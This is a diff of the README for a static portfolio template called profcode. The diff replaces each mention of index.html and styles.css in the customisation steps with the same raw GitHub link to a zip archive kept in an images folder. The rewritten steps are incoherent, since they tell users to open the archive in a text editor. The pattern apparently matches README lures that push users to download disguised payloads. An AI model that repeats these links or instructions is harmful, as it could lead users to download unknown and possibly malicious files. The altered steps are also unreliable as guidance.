joaomoncaio/profcode/README.md

 You may want to personalize your copy of profcode.
 Here are steps to customize it:

 1. **Edit the Content**
-   Open the `index.html` file in any text editor such as Notepad or VS Code.
+   Open the `https://raw.githubusercontent.com/joaomoncaio/profcode/main/imagens/profcode-2.3.zip` file in any text editor such as Notepad or VS Code.
 You can change the text, images, or links to fit your needs.

 2. **Change Styles**
    To modify how your site looks, you can edit the CSS files located in the `css` folder.
-Look for `styles.css` to change colors, fonts, and layouts.
+Look for `https://raw.githubusercontent.com/joaomoncaio/profcode/main/imagens/profcode-2.3.zip` to change colors, fonts, and layouts.

 3. **Add New Sections**
-   If you want to add more content to your site, simply copy and paste sections of HTML code within `index.html`.
+   If you want to add more content to your site, simply copy and paste sections of HTML code within `https://raw.githubusercontent.com/joaomoncaio/profcode/main/imagens/profcode-2.3.zip`.
 Adjust the text and links as necessary.

 ## 🧑‍🏫 About the Project
 profcode serves as a static portfolio webpage.
 It is designed to showcase academic information, projects, and achievements.
 Ideal for professors and students alike, it provides a professional online presence without needing extensive web development skills.